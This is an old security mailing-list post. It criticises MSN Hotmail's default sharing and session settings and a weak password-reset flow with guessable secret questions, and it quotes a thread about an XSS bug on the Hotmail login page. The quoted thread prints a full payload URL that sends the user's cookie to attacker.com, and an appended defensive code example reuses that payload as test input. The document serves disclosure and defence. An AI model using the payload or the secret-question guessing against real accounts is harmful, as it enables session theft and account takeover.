Hi Everyone,

MSN Passport's (read: Microsoft's) basic mentality about security is itself very insecure. In November 2001 and April 2002, when some security bugs were mentioned, MSN did patch some of their systems. But surprisingly, we found many of the systems still used the buggy techniques, say, JavaScript, within their own pages. Even today, when one opens MSN Hotmail in IE6, it many times says "Script Error" (or something similar). Can't they make their own mail system compatible with their own browser?

Other issues we observed but kept silent about were:

a) When MS transitioned from MS Hotmail to MSN Hotmail, they reset all users' options to somewhat insecure settings. I am unaware if any warning or alert was sent before doing so. The settings affected were (still are, and maybe are default settings for new accounts):

(Under Personal Profile...)
1. Share my e-mail address.
2. Share my first and last names.
3. Share my other registration information.

The above three options are enabled by default. I assume that these may be a prime source of leaking information to spammers, besides other security risks. If you have these options enabled, disable them NOW!

(Under Other Options...)
4. Session Expiration is set to NEVER.

Probably, if session expiration is set to the minimum available, 2 hours, the chances of others getting into your Hotmail account become less.

b) The change password policy: Hotmail's Reset Password option can be used by any user, as long as the account holder is not in the US, that is, his/her location is not set to US. This is because when the "forgot password" option is invoked (and a secret question is present in the database), the next step asks for the username and country. If the country is not US, then a third field, ZIP CODE, is skipped and the secret question page is shown. Of course one has to know the answer to the question, but then, MS has provided enough freedom to users to type in any question they like.

During our research, we found questions like "How are you?" and "Whom do you love most?". Anyone's guess: we found the answers to be like "Fine" (or "Bad" or "Not Good") and "me" (or "myself" or "my lover") respectively. The answers in brackets are the next possible answers, but we could guess them, at most, on the second attempt only. Time to change Hotmail policies??

With warm regards and best wishes,

Inderjeet S Sodhi
Infotech Consultant, E-Security and S/W Solution Provider, Web Designer and Beta Tester.

----- Original Message -----
From: "Russell Harding" <hardingr@cunap.com>
To: "Thor Larholm" <Thor@jubii.dk>
Sent: Tuesday, October 08, 2002 12:20 PM
Subject: RE: XSS bug in hotmail login page

> Hello, comments below:
>
> On Mon, 7 Oct 2002, Thor Larholm wrote:
>
> > It's very simple, you can inject arbitrary scripting to be executed by the
> > user in the context of hotmail. This means that you can e.g. steal his
> > cookies or, if he's logged in, write emails from his account, delete his
> > mails and change his password.
> >
>
> I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
> from GET requests. While you can view your own cookies easily, I'm not
> sure if you can still exploit this bug. I do know filtering these
> characters prevents this sort of attack:
>
> http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=
>
> Is there another way to exploit this which I am not seeing? Or does MSN
> actually have their act together (in this particular case...)?
>
> -Russell
>
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?
>
>
> On Mon, 7 Oct 2002, Thor Larholm wrote:
>
> > > From: Peter Rdam [mailto:hell@weedmail.com]
> > > They didn't react, and I'm pretty curious about what
> > > is possible with the bug. And I actually hope that
> > > someone can tell me about it and maybe Microsoft will
> > > do something about it..
> >
> > It's very simple, you can inject arbitrary scripting to be executed by the
> > user in the context of hotmail. This means that you can e.g. steal his
> > cookies or, if he's logged in, write emails from his account, delete his
> > mails and change his password.
> >
> >
> >
> > Regards
> > Thor Larholm
> > Jubii A/S - Internet Programmer
> >
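The thread above turns on whether stripping "+" from GET requests neutralises the reflected `cb` parameter. The following is an added example, not code from the thread or from Microsoft: it models a login page that reflects `cb` into a hidden-field attribute (a constructed stand-in for the real page) and contrasts the character-stripping filter Russell describes with contextual output encoding, which is the fix a defender would actually apply.

```javascript
// Added example, not from the original thread: why stripping "+" is not a fix for
// the reflected `cb` parameter. The login page below is a constructed stand-in that
// reflects `cb` into a hidden-field attribute, the context implied by the quoted URL.

// Mirrors Russell's observation that Hotmail strips "+" (and %2B) from GET requests.
function stripPlus(value) {
  return String(value).replace(/\+/g, "");
}

// Contextual output encoding for a double-quoted HTML attribute value: every
// character that can end the value or open a tag becomes an entity.
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function htmlAttrEncode(value) {
  return String(value).replace(/[&<>"']/g, (c) => ENTITY[c]);
}

// Constructed page fragment. Stripping removes one JavaScript operator but leaves
// the quote and angle brackets that break out of the attribute.
function renderWithStripping(cb) {
  return `<input type="hidden" name="cb" value="${stripPlus(cb)}">`;
}

// Hardened fragment: the same value, encoded for the attribute context.
function renderWithEncoding(cb) {
  return `<input type="hidden" name="cb" value="${htmlAttrEncode(cb)}">`;
}

// Structural check a code reviewer or test suite can run on the output: the fragment
// should contain exactly one element, so every "<" beyond the first is an injected tag.
function countTags(html) {
  return (html.match(/</g) || []).length;
}

// Decoded `cb` value from the URL quoted in the thread, used here as test input.
const CB_FROM_THREAD =
  "\"><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>";

console.log("stripping:", countTags(renderWithStripping(CB_FROM_THREAD)), "tags"); // 3
console.log("encoding :", countTags(renderWithEncoding(CB_FROM_THREAD)), "tags");  // 1
```

With stripping, the `<script>` element still lands in the page (only the string concatenation inside it is broken); with attribute encoding, the output contains exactly the one intended element.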